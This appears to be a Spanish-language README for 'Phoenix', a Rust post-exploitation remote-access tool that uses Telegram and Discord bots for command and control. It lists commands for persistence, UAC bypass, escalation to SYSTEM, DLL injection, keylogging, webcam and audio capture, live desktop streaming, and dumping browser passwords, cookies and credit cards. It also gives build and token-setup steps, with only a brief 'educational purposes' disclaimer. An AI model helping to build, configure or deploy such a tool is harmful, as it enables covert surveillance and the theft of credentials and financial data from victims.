
Marco de post-explotación que abusa de sitios de confianza como Telegram y Discord para C2.
Phoenix es un framework de post-explotación basado en async que abusa de sitios confiables para C2.
Phoenix actualmente soporta las siguientes plataformas a través de sus APIs de Bot:
Phoenix ofrece las siguientes características básicas :
Command Description
------- -----------
/hello Comprueba si el bot está activo en el host
/help Muestra el mensaje de ayuda
/persist Mantiene el acceso después del reinicio. (Requiere bypass de UAC)
/sleep Duerme. Uso: /sleep (segundos)
/reboot Reinicia el host
/shutdown Apaga el host
/exit Finaliza la sesión
/self_del Autoelimina el ejecutable
/pwd Muestra el directorio de trabajo
/dir Lista el directorio de trabajo
/cd Cambia de directorio. Uso: /cd (ruta)
/search Busca archivos. Uso: /search (ruta) (archivo)
/upload Sube archivos. Uso: /upload (archivo), /upload *.jpg
/uid Obtiene el ID de usuario
/users Lista los usuarios disponibles
/privs Lista los privilegios
/sysinfo Muestra información del sistema
/location Obtiene información de geolocalización
/hw Lista el hardware instalado
/sw Lista el software instalado
/drv Lista las unidades conectadas
/net Lista los adaptadores de red
/pid Muestra el ID del proceso actual
/ps Lista los procesos en ejecución
/pkill Mata un proceso por ID
/exec Ejecuta un comando
/chat Muestra un mensaje personalizado
/webcam_list Lista las webcams disponibles
/webcam_snap Toma una captura de webcam: Uso: /webcam_snap (índice)
/recaudio Graba audio. Uso: /recaudio (segundos)
/screenshot Toma una captura de pantalla
/keylog Inicia el keylogging
/keylog_stop Detiene los hilos de keylogging
/browser_dump Vuelca datos del navegador
/clipboard Vuelca datos del portapapeles
/stream_desktop Transmite en vivo el escritorio del host
/stream_webcam Transmite en vivo la webcam del host
/stream_stop Detiene los hilos de transmisión en vivo *** necesita trabajo
/get_system Eleva privilegios a SYSTEM
/bypass_uac Omite las indicaciones de UAC
/inject Inyecta un proceso objetivo. Uso: /inject (ruta_dll)
[!NOTE]
Phoenix soporta la recolección de datos de los siguientes navegadores:
Chrome,Edge,Braveyfirefox.
- ¡La desencriptación de contraseñas de Firefox no está soportada actualmente!
- El módulo de volcado de Chromium está basado en el proyecto de código abierto: https://github.com/Maldev-Academy/DumpBrowserSecrets/tree/main/DllExtractChromiumSecrets.
La tabla a continuación muestra la lista de datos recolectados para cada navegador compatible :
Phoenix actualmente implementa ofuscación XOR simple, lo que significa que los tokens aún estarán codificados en el binario. La ofuscación es solo una defensa básica para evitar la inspección casual de cadenas, no para detener a ingenieros inversos hábiles.
Ngrok es esencial para tunelizar el tráfico de transmisión en vivo; Phoenix no podría transmitir el escritorio/webcam del host sin un token de Ngrok adecuado.
/src/tunnel.rs, reemplaza la variable token con tu token real:let token = obfuscate!("YOUR_NGROK_TOKEN");
/src/telegram.rs, reemplaza las variables bot_token e id con tu token de bot y ID de chat reales:let bot_token = obfuscate!("YOUR_TELEGRAM_TOKEN");
let id: i64 = 123456789;
> cargo build --release --bin telegram
/src/discord.rs, reemplaza la variable token con tu token de bot real:let token = obfuscate!("YOUR_DISCORD_TOKEN");
> cargo build --release --bin discord
[!IMPORTANT] Los binarios generados requieren privilegios de administrador para funcionar correctamente.
screenshot
[!CAUTION] Este proyecto se proporciona únicamente con fines educativos y de investigación. Eres responsable de asegurarte de tener la autorización adecuada antes de usar esta herramienta. El autor no asume ninguna responsabilidad por el mal uso.
¡Las contribuciones y sugerencias son bienvenidas! Si tienes consultas comerciales 'éticas' o deseas colaborar, no dudes en contactar a: [email protected]
| Chrome/Edge/Brave | Firefox |
|---|
| Historial | ✅ | ✅ |
| Cookies | ✅ | ✅ |
| Autocompletados | ✅ | ✅ |
| Tarjetas de crédito | ✅ | ✅ |
| Cookies | ✅ | ✅ |
| Inicios de sesión | ✅ | ❌ |